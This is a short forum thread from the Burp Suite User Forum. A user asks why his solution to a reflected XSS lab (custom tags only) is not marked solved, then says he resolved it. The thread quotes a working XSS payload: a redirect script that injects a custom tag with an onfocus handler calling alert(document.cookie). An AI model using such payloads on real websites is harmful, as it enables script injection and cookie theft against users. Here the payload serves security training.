Burp Suite User Forum

Create new post

Reflected XSS into HTML context with all tags blocked except custom ones

Dario | Last updated: Mar 08, 2023 01:15PM UTC

ello, I tried copying and pasting the solution, replacing the LAB ID, which in my case from the link https://exploit-0a2e00f604bd5197c065ff3c01aa00ea.exploit-server.net/exploit was "exploit-0a2e00f604bd5197c065ff3c01aa00ea" and pasted it into the script <script> location = 'https://YOUR-LAB-ID.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> so it looks like this to me : <script> location = 'https://exploit-0a2e00f604bd5197c065ff3c01aa00ea.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> Unfortunately after doing the "store" and "delivery" it doesn't give me the "solved lab", I also tried changing the payload to different variants : 'https://0a2e00f604bd5197c065ff3c01aa00ea.web-security-academy.net/? 'https://exploit-0a2e00f604bd5197c065ff3c01aa00ea.web-security-academy.net/? 'https://exploit-0a2e00f604bd5197c065ff3c01aa00ea.exploit-server.net/? 'https://0a2e00f604bd5197c065ff3c01aa00ea..exploit-server.net/? Can you help me?

Dario | Last updated: Mar 08, 2023 08:12PM UTC

i resolved thanks

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.